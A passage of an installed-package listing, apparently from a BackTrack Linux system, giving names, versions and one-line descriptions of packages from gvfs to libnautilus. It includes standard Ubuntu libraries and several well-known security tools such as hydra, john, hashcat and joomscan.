1.6.1-0ubuntu1build1 userspace virtual filesystem - server ii gvfs-backends 1.6.1-0ubuntu1build1 userspace virtual filesystem - backends ii gzip 1.3.12-9ubuntu1.1 GNU compression utilities ii hack-library 1.0-bt2 A collection of tools used for SIP attack tools. ii hashcat 0.36-bt4 cpu based multihash cracker ii hashcat-utils 0.3-bt3 Utilities for creating and manipulation wordlists ii hdparm 9.15-1ubuntu9 tune hard disk parameters for high performance ii hexedit 1.2.12-bt0 View and edit files in hexadecimal or in ASC II. ii hexinject 1.2-bt1 HexInject is a very versatile packet injector and sniffer, that provide a command-line framework for raw network access. ii hicolor-icon-theme 0.11-1 default fallback theme for FreeDesktop.org icon themes ii honeycomb 0.7-bt6 Automated signature creation using honeypots. ii honeyd 1.5c-bt3 Honeyd is a small daemon that creates virtual hosts on a network. ii hostname 3.03ubuntu1 utility to set/show the host name or domain name ii hpijs 3.10.2-2ubuntu2.2 HP Linux Printing and Imaging - gs IJS driver (hpijs) ii hping2 2.0.0-rc3-bt2 hping is a command-line oriented TCP/IP packet assembler/analyzer. ii hping3 20051105-bt2 hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn't only able to sen ii httprint 301-bt2 httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may h ii humanity-icon-theme 0.5.2.1 Humanity Icon theme ii hunspell-en-us 20070829-4ubuntu1 English_american dictionary for hunspell ii hydra 6.3-bt6 A very fast network logon cracker which support many different services. ii iaxflood 1.0-bt0 A UDP Inter-Asterisk_eXchange (i.e. IAX) ii icedtea-6-jre-cacao 6b20-1.9.7-0ubuntu1~10.04.1 Alternative JVM for OpenJDK, using Cacao ii icoutils 0.29.1-0ubuntu1~lucid Create and extract MS Windows icons and cursors ii ida-pro-free 5.0-bt3 The IDA Pro Disassembler and Debugger is an interactive, programmable, extendible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X. ii ifupdown 0.6.8ubuntu29.2 high level tools to configure network interfaces ii iisemulator 0.95-3 Emulation for the IIS web server ii ike-scan 1.9-bt2 ike-scan is a command-line tool that uses the IKE protocol to discover, fingerprint and test IPsec VPN servers. ii imagemagick 7:6.5.7.8-1ubuntu1.1 image manipulation programs ii impacket-examples 0.9.6.0-bt1 A collection of Python classes focused on providing access to network packets. ii indicator-applet 0.3.7-0ubuntu1 GNOME panel indicator applet ii indicator-application 0.0.19-0ubuntu4 Application Indicators ii indicator-messages 0.3.6-0ubuntu2 GNOME panel indicator applet for messages ii indicator-sound 0.2.6-0ubuntu1 A system sound indicator. ii info 4.13a.dfsg.1-5ubuntu1 Standalone GNU Info documentation browser ii initramfs-tools 0.92bubuntu78 tools for generating an initramfs ii initramfs-tools-bin 0.92bubuntu78 binaries used by initramfs-tools ii initscripts 2.87dsf-4ubuntu17.2 scripts for initializing and shutting down the system ii insserv 1.12.0-14 Tool to organize boot sequence using LSB init.d script dependencies ii install-info 4.13a.dfsg.1-5ubuntu1 Manage installed documentation in info format ii installation-report 2.39ubuntu4 system installation report ii intel-gpu-tools 1.0.2+git20100324-0ubuntu1 tools for debugging the Intel graphics driver ii intltool 0.41.0-0ubuntu1 Utility scripts for internationalizing XML ii intltool-debian 0.35.0+20060710.1 Help i18n of RFC822 compliant config files ii inviteflood 2.0-bt1 Command line tool to attempt to flood a specific destination. ii iodine 0.6.0-rc1-bt2 This is a piece of software that lets you tunnel IPv4 data through a DNS server. This can be usable in different situations where internet access is firew ii ipcalc 0.41-bt1 IPv4 Calculator ii iproute 20091226-1 networking and traffic control tools ii iptables 1.4.4-2ubuntu2 administration tools for packet filtering and NAT ii iputils-ping 3:20071127-2ubuntu1 Tools to test the reachability of network hosts ii iputils-tracepath 3:20071127-2ubuntu1 Tools to trace the network path to a remote host ii irb 4.2-2~uorppa0 Interactive Ruby (irb) ii irb1.8 1.8.7.249-2 Interactive Ruby (for Ruby 1.8) ii irb1.9.2 1.9.2.z1-1ppa1~lucid Interactive Ruby (for Ruby 1.9.2) ii irpas 0.10-bt1 The idea is to implement small tools which can be scripted for larger tests while using the protocols describd in standards or white papers. IRPAS is not ii irqbalance 0.55+20091017-3ubuntu2 Daemon to balance interrupts for SMP systems ii iso-codes 3.12.1-1 ISO language, territory, currency, script codes and their translations ii iw 0.9.22-bt2 iw is a new nl80211 based CLI configuration utility for wireless devices. ii iwar 0.08-bt1 iWar is a "war dialer" written completely in C for Unix types of operating systems (Linux, FreeBSD, OpenBSD, etc). It is intended for legal phone security ii java-common 0.34 Base of all Java packages ii john 1.7.6-jumbo-12-bt5 John the Ripper is a fast password cracker. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the ii joomscan 0.0.4-bt2 Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site. ii kbd 1.15-1ubuntu3 Linux console font and keytable utilities ii keepnote 0.7.1-bt0 A note taking and organization application. ii kernel-package 12.032 A utility for building Linux kernel related Debian packages. ii keyutils 1.2-12 Linux Key Management Utilities ii kismet 201103r2-bt1 An 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. ii klibc-utils 1.5.17-4ubuntu1 small utilities built with klibc for early boot ii lame 3.98.2+debian-0ubuntu3 An MP3 encoding library (frontend) ii landscape-common 11.02-0ubuntu0.10.04.1 The Landscape administration system client ii language-pack-en 1:10.04+20110204 translation updates for language English ii language-pack-en-base 1:10.04+20110204 translations for language English ii language-selector-common 0.5.8 Language selector for Ubuntu Linux ii lanmap2 1.0-bt1 Builds database/visualizations of LAN structure from passively sifted information. ii laptop-detect 0.13.7ubuntu2 attempt to detect a laptop ii launchpad-integration 0.1.35 launchpad integration ii lbd 0.2-bt2 lbd (load balancing detector) detects if a given domain uses DNS and/or HTTP Load-Balancing. ii less 436-1 pager program similar to more ii libaa1 1.4p5-38build1 asc ii art library ii libaccess-bridge-java 1.26.2-3 Java Access Bridge for GNOME ii libaccess-bridge-java-jni 1.26.2-3 Java Access Bridge for GNOME (jni bindings) ii libacl1 2.2.49-2 Access control list shared library ii libamd2.2.0 1:3.4.0-1ubuntu3 approximate minimum degree ordering library for sparse matrices ii libao2 0.8.8-5ubuntu2 Cross Platform Audio Output Library ii libapache2-mod-php5 5.3.2-1ubuntu4.9 server-side, HTML-embedded scripting language (Apache 2 module) ii libapparmor-perl 2.5.1-0ubuntu0.10.04.3 AppArmor library Perl bindings ii libapparmor1 2.5.1-0ubuntu0.10.04.3 changehat AppArmor library ii libappindicator0 0.0.19-0ubuntu4 Application Indicators ii libapr1 1.3.8-1build1 The Apache Portable Runtime Library ii libaprutil1 1.3.9+dfsg-3ubuntu0.10.04.1 The Apache Portable Runtime Utility Library ii libaprutil1-dbd-sqlite3 1.3.9+dfsg-3ubuntu0.10.04.1 The Apache Portable Runtime Utility Library - SQLite3 Driver ii libaprutil1-ldap 1.3.9+dfsg-3ubuntu0.10.04.1 The Apache Portable Runtime Utility Library - LDAP Driver ii libarchive1 2.8.0-2 Single library to read/write tar, cpio, pax, zip, iso9660, etc. ii libart-2.0-2 2.3.20-2build1 Library of functions for 2D graphics - runtime files ii libasound2 1.0.22-0ubuntu7 shared library for ALSA applications ii libasound2-dev 1.0.22-0ubuntu7 shared library for ALSA applications -- development files ii libasound2-plugins 1.0.22-0ubuntu6 ALSA library additional plugins ii libaspell15 0.60.6-3ubuntu1 GNU Aspell spell-checker runtime library ii libast2 0.7-3 the Library of Assorted Spiffy Things ii libatasmart4 0.17+git20100219-1git2 ATA S.M.A.R.T. reading and parsing library ii libatk1.0-0 1.30.0-0ubuntu2.1 The ATK accessibility toolkit ii libatk1.0-data 1.30.0-0ubuntu2.1 Common files for the ATK accessibility toolkit ii libatm1 1:2.5.1-1.2 shared library for ATM (Asynchronous Transfer Mode) ii libatspi1.0-0 1.30.1-0ubuntu1 C binding libraries of at-spi for GNOME Accessibility ii libattr1 1:2.4.44-1 Extended attribute shared library ii libaudio2 1.9.2-3 Network Audio System - shared libraries ii libaudiofile0 0.2.6-8ubuntu1 Open-source version of SGI's audiofile library ii libavahi-client3 0.6.25-1ubuntu6.2 Avahi client library ii libavahi-common-data 0.6.25-1ubuntu6.2 Avahi common data files ii libavahi-common3 0.6.25-1ubuntu6.2 Avahi common library ii libavahi-compat-libdnssd1 0.6.25-1ubuntu6.2 Avahi Apple Bonjour compatibility library ii libavahi-core6 0.6.25-1ubuntu6.2 Avahi's embeddable mDNS/DNS-SD library ii libavahi-glib1 0.6.25-1ubuntu6.2 Avahi glib integration library ii libavc1394-0 0.5.3-1build4 control IEEE 1394 audio/video devices ii libavcodec52 4:0.5.1-1ubuntu1.1 ffmpeg codec library ii libavformat52 4:0.5.1-1ubuntu1.1 ffmpeg file format library ii libavutil49 4:0.5.1-1ubuntu1.1 ffmpeg utility library ii libbfb0 0.23-1 bfb protocol library ii libbind9-60 1:9.7.0.dfsg.P1-1ubuntu0.1 BIND9 Shared Library used by BIND ii libblas3gf 1.2-2build1 Basic Linear Algebra Subroutines 3, shared library ii libblkid1 2.17.2-0ubuntu1.10.04.2 block device id library ii libbluetooth3 4.60-0ubuntu8 Library to use the BlueZ Linux Bluetooth stack ii libbonobo2-0 2.24.3-0ubuntu1 Bonobo CORBA interfaces library ii libbonobo2-common 2.24.3-0ubuntu1 Bonobo CORBA interfaces library -- support files ii libbonoboui2-0 2.24.3-0ubuntu1 The Bonobo UI library ii libbonoboui2-common 2.24.3-0ubuntu1 The Bonobo UI library -- common files ii libboost-filesystem1.40.0 1.40.0-4ubuntu4 filesystem operations (portable paths, iteration over directories, etc) in C++ ii libboost-python1.40.0 1.40.0-4ubuntu4 Boost.Python Library ii libboost-regex1.40.0 1.40.0-4ubuntu4 regular expression library for C++ ii libboost-system1.40.0 1.40.0-4ubuntu4 Operating system (e.g. diagnostics support) library ii libboost-thread1.40.0 1.40.0-4ubuntu4 portable C++ multi-threading ii libbsd0 0.2.0-1 utility functions from BSD systems - shared library ii libbz2-1.0 1.0.5-4ubuntu0.1 high-quality block-sorting file compressor library - runtime ii libc-ares2 1.7.0-1 library for asyncronous name resolves ii libc-bin 2.11.1-0ubuntu7.8 Embedded GNU C Library: Binaries ii libc-dev-bin 2.11.1-0ubuntu7.8 Embedded GNU C Library: Development binaries ii libc6 2.11.1-0ubuntu7.8 Embedded GNU C Library: Shared libraries ii libc6-dev 2.11.1-0ubuntu7.8 Embedded GNU C Library: Development Libraries and Header Files ii libc6-i686 2.11.1-0ubuntu7.8 GNU C Library: Shared libraries [i686 optimized] ii libcaca0 0.99.beta16-3 colour ASC II art library ii libcairo2 1.8.10-2ubuntu1 The Cairo 2D vector graphics library ii libcairomm-1.0-1 1.8.4-0ubuntu1 C++ wrappers for Cairo (shared libraries) ii libcamel1.2-14 2.28.3.1-0ubuntu6 The Evolution MIME message handling library ii libcanberra-gtk-module 0.22-1ubuntu2 translates Gtk+ widgets signals to event sounds ii libcanberra-gtk0 0.22-1ubuntu2 Gtk+ helper for playing widget event sounds with libcanberra ii libcanberra0 0.22-1ubuntu2 a simple abstract interface for playing event sounds ii libcap-ng0 0.6.2-4 An alternate posix capabilities library ii libcap2 1:2.17-2ubuntu1 support for getting/setting POSIX.1e capabilities ii libcap2-bin 1:2.17-2ubuntu1 basic utility programs for using capabilities ii libccid 1.3.11-1 PC/SC driver for USB CCID smart card readers ii libcdio-cdda0 0.81-4 library to read and control digital audio CDs ii libcdio-paranoia0 0.81-4 library to read digital audio CDs with error correction ii libcdio10 0.81-4 library to read and control CD-ROM ii libcdparanoia0 3.10.2+debian-9 audio extraction tool for sampling CDs (library) ii libck-connector0 0.4.1-3ubuntu2 ConsoleKit libraries ii libclass-accessor-perl 0.34-1 Perl module that automatically generates accessors ii libclutter-1.0-0 1.2.4-0ubuntu1 Open GL based interactive canvas library ii libcomerr2 1.41.11-1ubuntu2.1 common error description library ii libcroco3 0.6.2-1 a generic Cascading Style Sheet (CSS) parsing and manipulation toolkit ii libcups2 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - Core library ii libcupscgi1 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - CGI library ii libcupsdriver1 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - Driver library ii libcupsimage2 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - Raster image library ii libcupsmime1 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - MIME library ii libcupsppdc1 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - PPD manipulation library ii libcurl3 7.19.7-1ubuntu1 Multi-protocol file transfer library (OpenSSL) ii libcurl3-gnutls 7.19.7-1ubuntu1 Multi-protocol file transfer library (GnuTLS) ii libcurses-perl 1.28-1 Curses interface for Perl ii libcurses-ui-perl 0.9607-1 curses-based OO user interface framework for Perl ii libcwidget3 0.5.13-1ubuntu1 high-level terminal interface library for C++ (runtime files) ii libdaemon0 0.14-2 lightweight C library for daemons - runtime library ii libdatrie1 0.2.2-3 Double-array trie library ii libdb4.6 4.6.21-16 Berkeley v4.6 Database Libraries [runtime] ii libdb4.8 4.8.24-1ubuntu1 Berkeley v4.8 Database Libraries [runtime] ii libdbd-mysql-perl 4.012-1ubuntu1 A Perl5 database interface to the MySQL database ii libdbd-sqlite3-perl 1.29-1 Perl DBI driver with a self-contained RDBMS ii libdbi-perl 1.609-1build1 Perl Database Interface (DBI) ii libdbus-1-3 1.2.16-2ubuntu4.2 simple interprocess messaging system ii libdbus-glib-1-2 0.84-1 simple interprocess messaging system (GLib-based shared library) ii libdbusmenu-glib1 0.2.9-0ubuntu3.1 Menus over DBus shared library for glib ii libdbusmenu-gtk1 0.2.9-0ubuntu3.1 Menus over DBus shared library for GTK ii libdebconfclient0 0.147 Debian Configuration Management System (C-implementation) ii libdebian-installer4 0.68ubuntu3 Library of common debian-installer functions ii libdevkit-power-gobject1 1:0.9.1-1 abstraction for power management - shared library (old ABI) ii libdevmapper1.02.1 2:1.02.39-1ubuntu4.1 The Linux Kernel Device Mapper userspace library ii libdigest-hmac-perl 1.01-7 create standard message integrity checks ii libdigest-sha1-perl 2.12-1build1 NIST SHA-1 message digest algorithm ii libdirectfb-1.2-0 1.2.8-5ubuntu2 direct frame buffer graphics - shared libraries ii libdiscover2 2.1.2-3 hardware identification library ii libdjvulibre-text 3.5.22-1ubuntu4.1 Linguistic support files for libdjvulibre ii libdjvulibre21 3.5.22-1ubuntu4.1 Runtime support for the DjVu image format ii libdmraid1.0.0.rc16 1.0.0.rc16-3ubuntu2 Device-Mapper Software RAID support tool - shared library ii libdnet 2.49ubuntu1 DECnet Libraries ii libdnet-dev 2.49ubuntu1 DECnet development libraries & Headers ii libdns64 1:9.7.0.dfsg.P1-1ubuntu0.1 DNS Shared Library used by BIND ii libdrm-intel1 2.4.18-1ubuntu3 Userspace interface to intel-specific kernel DRM services -- runtime ii libdrm-nouveau1 2.4.18-1ubuntu3 Userspace interface to nouveau-specific kernel DRM services -- runtime ii libdrm-radeon1 2.4.18-1ubuntu3 Userspace interface to radeon-specific kernel DRM services -- runtime ii libdrm2 2.4.18-1ubuntu3 Userspace interface to kernel DRM services -- runtime ii libdumbnet-dev 1.12-3 A dumb, portable networking library -- development files ii libdumbnet1 1.12-3 A dumb, portable networking library -- shared library ii libdv4 1.0.0-2ubuntu2 software library for DV format digital video (runtime lib) ii libebackend1.2-0 2.28.3.1-0ubuntu6 Utility library for evolution data servers ii libebook1.2-9 2.28.3.1-0ubuntu6 Client library for evolution address books ii libecal1.2-7 2.28.3.1-0ubuntu6 Client library for evolution calendars ii libecryptfs0 83-0ubuntu3.1 ecryptfs cryptographic filesystem (library) ii libedata-book1.2-2 2.28.3.1-0ubuntu6 Backend library for evolution address books ii libedata-cal1.2-6 2.28.3.1-0ubuntu6 Backend library for evolution calendars ii libedataserver1.2-11 2.28.3.1-0ubuntu6 Utility library for evolution data servers ii libedataserverui1.2-8 2.28.3.1-0ubuntu6 GUI utility library for evolution data servers ii libedit2 2.11-20080614-1build1 BSD editline and history libraries ii libeggdbus-1-0 0.6-1 D-Bus bindings for GObject ii libegroupwise1.2-13 2.28.3.1-0ubuntu6 Client library for accessing groupwise POA through SOAP interface ii libelf1 0.143-1 library to read and write ELF files ii libenchant1c2a 1.6.0-0ubuntu1 a wrapper library for various spell checker engines ii libept0 0.5.30 High-level library for managing Debian package information ii liberror-perl 0.17-1 Perl module for error/exception handling in an OO-ish way ii libesd0 0.2.41-6ubuntu1 Enlightened Sound Daemon - Shared libraries ii libestools1.2 1:1.2.96~beta-6 Edinburgh Speech Tools Library ii libevent-1.4-2 1.4.13-stable-1 An asynchronous event notification library ii libevent-core-1.4-2 1.4.13-stable-1 An asynchronous event notification library (core) ii libevent-dev 1.4.13-stable-1 Development libraries, header files and docs for libevent ii libevent-extra-1.4-2 1.4.13-stable-1 An asynchronous event notification library (extra) ii libewf1 20100119-1 library with support for Expert Witness Compression Format ii libexempi3 2.1.1-1build2 library to parse XMP metadata (Library) ii libexif12 0.6.19-1 library to parse EXIF files ii libexiv2-6 0.19-1 EXIF/IPTC metadata manipulation library ii libexpat1 2.0.1-7ubuntu1 XML parsing C library - runtime library ii libextractor-plugins 0.5.23+dfsg-4build1 extracts meta-data from files of arbitrary type (plugins) ii libextractor1c2a 0.5.23+dfsg-4build1 extracts meta-data from files of arbitrary type (library) ii libfbclient2 2.1.3.18185-0.ds1-6build1 Firebird client library ii libffi5 3.0.9-1 Foreign Function Interface library runtime ii libfile-copy-recursive-perl 0.38-1 Perl extension for recursively copying files and directories ii libfile-homedir-perl 0.86-1 Get the home directory for yourself or other users in Perl ii libfile-which-perl 1.08-1 Perl module for searching paths for executable programs ii libflac8 1.2.1-2build2 Free Lossless Audio Codec - runtime C library ii libfont-afm-perl 1.20-1 Font::AFM - Interface to Adobe Font Metrics files ii libfontconfig1 2.8.0-2ubuntu1 generic font configuration library - runtime ii libfontenc1 1:1.0.5-1 X11 font encoding library ii libfreetype6 2.3.11-1ubuntu2.4 FreeType 2 font engine, shared library files ii libfribidi0 0.19.2-1 Free Implementation of the Unicode BiDi algorithm ii libfs6 2:1.0.2-1build1 X11 Font Services library ii libfuse2 2.8.1-1.1ubuntu3.1 Filesystem in USErspace library ii libgail18 2.20.1-0ubuntu2 GNOME Accessibility Implementation Library -- shared libraries ii libgamin0 0.1.10-1ubuntu3 Client library for the gamin file and directory monitoring system ii libgc1c2 1:6.8-1.2ubuntu1 conservative garbage collector for C and C++ ii libgcc1 1:4.4.3-4ubuntu5 GCC support library ii libgconf2-4 2.28.1-0ubuntu1 GNOME configuration database system (shared libraries) ii libgcr0 2.92.92.is.2.30.3-0ubuntu1.1 Library for Crypto UI related task - runtime ii libgcrypt11 1.4.4-5ubuntu2 LGPL Crypto library - runtime library ii libgd2-noxpm 2.0.36~rc1~dfsg-3.1ubuntu1 GD Graphics Library version 2 (without XPM support) ii libgdata-google1.2-1 2.28.3.1-0ubuntu6 Client library for accessing Google POA through SOAP interface ii libgdata1.2-1 2.28.3.1-0ubuntu6 Client library for accessing Google POA through SOAP interface ii libgdbm3 1.8.3-9 GNU dbm database routines (runtime version) ii libgdu0 2.30.1-1 GObject based Disk Utility Library ii libgeoip1 1.4.6.dfsg-17 A non-DNS IP-to-country resolver library ii libgfortran3 4.4.3-4ubuntu5 Runtime library for GNU Fortran applications ii libgif-dev 4.1.6-9 library for GIF images (development) ii libgif4 4.1.6-9 library for GIF images (library) ii libgirepository1.0-0 0.6.8-1 Library for handling GObject introspection data (runtime library) ii libgjs0 0.5-1ubuntu2.3 Mozilla-based javascript bindings for the GNOME platform ii libgksu2-0 2.0.13~pre1-1ubuntu4.1 library providing su and sudo functionality ii libgl1-mesa-dri 7.7.1-1ubuntu3 A free implementation of the OpenGL API -- DRI modules ii libgl1-mesa-glx 7.7.1-1ubuntu3 A free implementation of the OpenGL API -- GLX runtime ii libglade2-0 1:2.6.4-1build1 library to load .glade files at runtime ii libglib2.0-0 2.24.1-0ubuntu1 The GLib library of C routines ii libglib2.0-data 2.24.1-0ubuntu1 Common files for GLib library ii libglibmm-2.4-1c2a 2.24.2-0ubuntu1 C++ wrapper for the GLib toolkit (shared libraries) ii libglu1-mesa 7.7.1-1ubuntu3 The OpenGL utility library (GLU) ii libgmp3c2 2:4.3.2+dfsg-1ubuntu1 Multiprecision arithmetic library ii libgnome-desktop-2-17 1:2.30.2-0ubuntu1 Utility library for loading .desktop files - runtime files ii libgnome-keyring0 2.30.1-0ubuntu1 GNOME keyring services library ii libgnome-media0 2.30.0-0ubuntu1 runtime libraries for the GNOME media utilities ii libgnome-menu2 2.30.0-0ubuntu4 an implementation of the freedesktop menu specification for GNOME ii libgnome-window-settings1 1:2.30.1-0ubuntu1 Utility library for getting window manager settings ii libgnome2-0 2.30.0-0ubuntu1 The GNOME library - runtime files ii libgnome2-common 2.30.0-0ubuntu1 The GNOME library - common files ii libgnomecanvas2-0 2.30.1-0ubuntu1 A powerful object-oriented display - runtime files ii libgnomecanvas2-common 2.30.1-0ubuntu1 A powerful object-oriented display - common files ii libgnomekbd-common 2.30.2-0ubuntu0.1 GNOME library to manage keyboard configuration - common files ii libgnomekbd4 2.30.2-0ubuntu0.1 GNOME library to manage keyboard configuration - shared library ii libgnomeui-0 2.24.3-1 The GNOME libraries (User Interface) - runtime files ii libgnomeui-common 2.24.3-1 The GNOME libraries (User Interface) - common files ii libgnomevfs2-0 1:2.24.2-1ubuntu2 GNOME Virtual File System (runtime libraries) ii libgnomevfs2-common 1:2.24.2-1ubuntu2 GNOME Virtual File System (common files) ii libgnutls26 2.8.5-2 the GNU TLS library - runtime library ii libgomp1 4.4.3-4ubuntu5 GCC OpenMP (GOMP) support library ii libgp11-0 2.92.92.is.2.30.3-0ubuntu1.1 Glib wrapper library for PKCS#11 - runtime ii libgpg-error0 1.6-1ubuntu2 library for common error values and messages in GnuPG components ii libgphoto2-2 2.4.8-0ubuntu2 gphoto2 digital camera library ii libgphoto2-port0 2.4.8-0ubuntu2 gphoto2 digital camera port library ii libgpm2 1.20.4-3.2ubuntu2 General Purpose Mouse - shared library ii libgps19 2.92-4 Global Positioning System - library ii libgraphviz4 2.20.2-8ubuntu3 rich set of graph drawing tools ii libgs8 8.71.dfsg.1-0ubuntu5.3 The Ghostscript PostScript/PDF interpreter Library ii libgsf-1-114 1.14.16-1ubuntu1 Structured File Library - runtime version ii libgsf-1-common 1.14.16-1ubuntu1 Structured File Library - common files ii libgsm1 1.0.13-3 Shared libraries for GSM speech compressor ii libgsm1-dev 1.0.13-3 Development libraries for a GSM speech compressor ii libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.9 MIT Kerberos runtime libraries - krb5 GSS-API Mechanism ii libgssglue1 0.1-4 mechanism-switch gssapi library ii libgstreamer-plugins-base0.10-0 0.10.28-1 GStreamer libraries from the "base" set ii libgstreamer0.10-0 0.10.28-1 Core GStreamer libraries and elements ii libgtk2.0-0 2.20.1-0ubuntu2 The GTK+ graphical user interface library ii libgtk2.0-bin 2.20.1-0ubuntu2 The programs for the GTK+ graphical user interface library ii libgtk2.0-common 2.20.1-0ubuntu2 Common files for the GTK+ graphical user interface library ii libgtkmm-2.4-1c2a 1:2.20.3-0ubuntu1 C++ wrappers for GTK+ (shared libraries) ii libgtksourceview2.0-0 2.10.4-0ubuntu1 shared libraries for the GTK+ syntax highlighting widget ii libgtksourceview2.0-common 2.10.4-0ubuntu1 common files for the GTK+ syntax highlighting widget ii libgtop2-7 2.26.1-0ubuntu2 gtop system monitoring library ii libgtop2-common 2.26.1-0ubuntu2 common files for the gtop system monitoring library ii libgucharmap7 1:2.30.0-0ubuntu1 Unicode browser widget library (shared library) ii libgudev-1.0-0 1:151-12.3 GObject-based wrapper library for libudev ii libgutenprint2 5.2.5-0ubuntu1.1 runtime for the Gutenprint printer driver library ii libgvfscommon0 1.6.1-0ubuntu1build1 userspace virtual filesystem - library ii libgweather-common 2.30.0-0ubuntu1 GWeather common files ii libgweather1 2.30.0-0ubuntu1 GWeather shared library ii libhal-storage1 0.5.14-0ubuntu6 Hardware Abstraction Layer - shared library for storage devices ii libhal1 0.5.14-0ubuntu6 Hardware Abstraction Layer - shared library ii libhpmud0 3.10.2-2ubuntu2.2 HP Multi-Point Transport Driver (hpmud) run-time libraries ii libhtml-format-perl 2.04-2 format HTML syntax trees into text, PostScript or RTF ii libhtml-parser-perl 3.64-1 collection of modules that parse HTML text documents ii libhtml-tagset-perl 3.20-2 Data tables pertaining to HTML ii libhtml-template-perl 2.9-1 HTML::Template : A module for using HTML Templates with Perl ii libhtml-tree-perl 3.23-1 represent and create HTML syntax trees ii libhttp-server-simple-perl 0.41-1 simple stand-alone HTTP server ii libhunspell-1.2-0 1.2.8-6ubuntu1 spell checker and morphological analyzer (shared library) ii libiaxclient-dev 2.0.2-3build1 Portable IAX(2) protocol telephony client - development files ii libiaxclient1 2.0.2-3build1 Portable IAX(2) protocol telephony client - shared library ii libical0 0.44-3 iCalendar library implementation in C (runtime) ii libice-dev 2:1.0.6-1 X11 Inter-Client Exchange library (development headers) ii libice6 2:1.0.6-1 X11 Inter-Client Exchange library ii libicu42 4.2.1-3 International Components for Unicode ii libid3tag0 0.15.1b-10build2 ID3 tag reading library from the MAD project ii libidl0 0.8.13-1 library for parsing CORBA IDL files ii libidn11 1.15-2 GNU Libidn library, implementation of IETF IDN specifications ii libido-0.1-0 0.1.6-0ubuntu1 Shared library providing extra gtk menu items for display in ii libiec61883-0 1.2.0-0.1build1 an partial implementation of IEC 61883 ii libijs-0.35 0.35-7build1 IJS raster image transport protocol: shared library ii libilmbase6 1.0.1-3build2 several utility libraries from ILM used by OpenEXR ii libimage-exiftool-perl 7.89-1 Library and program to read and write meta information in multimedia files ii libimlib2 1.4.2-5build1 powerful image loading and rendering library ii libimobiledevice0 0.9.7-1ubuntu1 Library for communicating with the iPhone and iPod Touch ii libindicate4 0.3.6-0ubuntu1 GNOME panel indicator applet - shared library ii libindicator0 0.3.8-0ubuntu1 GNOME panel indicator applet - shared library ii libio-socket-ssl-perl 1.31-1 Perl module implementing object oriented interface to SSL sockets ii libio-string-perl 1.08-2 Emulate IO::File interface for in-core strings ii libisc60 1:9.7.0.dfsg.P1-1ubuntu0.1 ISC Shared Library used by BIND ii libisccc60 1:9.7.0.dfsg.P1-1ubuntu0.1 Command Channel Library used by BIND ii libisccfg60 1:9.7.0.dfsg.P1-1ubuntu0.1 Config File Handling Library used by BIND ii libiw30 30~pre9-3ubuntu4 Wireless tools - library ii libjack0 0.118+svn3796-1ubuntu2 JACK Audio Connection Kit (libraries) ii libjasper1 1.900.1-7 The JasPer JPEG-2000 runtime library ii libjpeg62 6b-15ubuntu1 The Independent JPEG Group's JPEG runtime library ii libjpeg62-dev 6b-15ubuntu1 Development files for the IJG JPEG library ii libjs-jquery 1.3.3-2ubuntu1 JavaScript library for dynamic web applications ii libjson-glib-1.0-0 0.7.6-0ubuntu2 GLib JSON manipulation library ii libjudydebian1 1.0.5-1 C library for creating and accessing dynamic arrays ii libk5crypto3 1.8.1+dfsg-2ubuntu0.9 MIT Kerberos runtime libraries - Crypto Library ii libkeyutils1 1.2-12 Linux Key Management Utilities (library) ii libklibc 1.5.17-4ubuntu1 minimal libc subset for use with initramfs ii libkpathsea5 2009-5ubuntu0.2 TeX Live: path search library for TeX (runtime part) ii libkrb5-3 1.8.1+dfsg-2ubuntu0.9 MIT Kerberos runtime libraries ii libkrb5support0 1.8.1+dfsg-2ubuntu0.9 MIT Kerberos runtime libraries - Support library ii liblapack3gf 3.2.1-2 library of linear algebra routines 3 - shared version ii liblaunchpad-integration1 0.1.35 library for launchpad integration ii liblcms1 1.18.dfsg-1ubuntu2.10.04.1 Color management library ii libldap-2.4-2 2.4.21-0ubuntu5.4 OpenLDAP libraries ii liblocale-gettext-perl 1.05-6 Using libc functions for internationalization in Perl ii liblockfile1 1.08-3ubuntu1 NFS-safe locking library, includes dotlockfile program ii liblog4cpp5 1.0-4 C++ library for flexible logging (runtime) ii libltdl7 2.2.6b-2ubuntu1 A system independent dlopen wrapper for GNU libtool ii liblua5.1-0 5.1.4-5 Simple, extensible, embeddable programming language ii liblwres60 1:9.7.0.dfsg.P1-1ubuntu0.1 Lightweight Resolver Library used by BIND ii liblzma1 4.999.9beta+20091116-1 XZ-format compression library ii liblzo2-2 2.03-2 data compression library ii libmad0 0.15.1b-4ubuntu1 MPEG audio decoder library ii libmagic1 5.03-5ubuntu1 File type determination library using "magic" numbers ii libmagickcore2 7:6.5.7.8-1ubuntu1.1 low-level image manipulation library ii libmagickcore2-extra 7:6.5.7.8-1ubuntu1.1 low-level image manipulation library - extra codecs ii libmagickwand2 7:6.5.7.8-1ubuntu1.1 image manipulation library ii libmail-sendmail-perl 0.79.16-1 Send email from a perl script ii libmailtools-perl 2.05-1 Manipulate email in perl programs ii libmdbtools 0.5.99.0.6pre1.0.20051109-6 mdbtools libraries ii libmetacity-private0 1:2.30.1-0ubuntu1.1 library for the Metacity window manager ii libmng1 1.0.9-1ubuntu1 Multiple-image Network Graphics library ii libmodplug0c2 1:0.8.7-1build1 shared libraries for mod music based on ModPlug ii libmp3lame0 3.98.2+debian-0ubuntu3 An MP3 encoding library ii libmpcdec3 1:1.2.2-2.1ubuntu1 Musepack (MPC) format library ii libmpeg2-4 0.4.1-3 MPEG1 and MPEG2 video decoder library ii libmpfr1ldbl 2.4.2-3ubuntu1 multiple precision floating-point computation ii libmpg123-0 1.12.1-0ubuntu1 MPEG layer 1/2/3 audio decoder -- runtime library ii libmulticobex1 0.23-1 multi-protocol cable OBEX library ii libmutter-private0 2.28.1~git20091208-1ubuntu7 library for the Mutter window manager ii libmysqlclient16 5.1.41-3ubuntu12.10 MySQL database client library ii libnautilus-extension1 1:2.31.1-0ubuntu2~ppa92 